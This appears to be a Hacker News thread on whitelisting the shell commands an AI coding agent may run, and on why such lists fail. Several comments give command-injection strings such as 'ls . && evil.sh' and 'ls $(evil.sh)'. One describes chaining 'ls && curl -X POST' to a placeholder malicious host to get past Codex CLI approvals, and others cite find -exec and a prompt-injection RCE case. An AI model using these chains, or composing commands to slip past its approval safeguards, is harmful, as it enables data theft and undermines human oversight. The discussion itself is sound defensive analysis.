new | ask | show | jobs
Anon1096 3 days ago  [ - ]

You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.

gruez 3 days ago  [ - ]

That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like

    cmd.split(" ") in ["cd", "ls", ...]
is easy target for command injections. just to think of a few:

    ls . && evil.sh

    ls $(evil.sh)
FergusArgyll 3 days ago  [ - ]

Yeah, this is ctf 101 see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command but the same principles can be used for this)

diggan 3 days ago  [ - ]

I'm 99% Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine.

wunderwuzzi23 3 days ago  [ - ]

About that find command...

Amazon Q Developer: Remote Code Execution with Prompt Injection

https://embracethered.com/blog/posts/2025/amazon-q-developer...

grepfru_it 3 days ago  [ - ]

well a complete implementation is also using inotify(7) which would review all files that were modified

chmod775 3 days ago  [ - ]

find can execute subcommands (-exec arg), and plenty of other shell commands can be used for that as well. Most build tools' configuration can be abused to execute arbitrary commands. And if your LLM can make changes to your codebase + run it, trying to limit the shell commands it can execute is pointless anyways.

Previously you might've been able to say "okay, but that requires the attacker to guess the specifics of my environment" - which is no longer true. An attacker can now simply instruct the LLM to exploit your environment and hope the LLM figures out how to do it on its own.

zeroonetwothree 3 days ago  [ - ]

Everything works very well until there is an exploit.

david_allison 3 days ago  [ - ]

> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?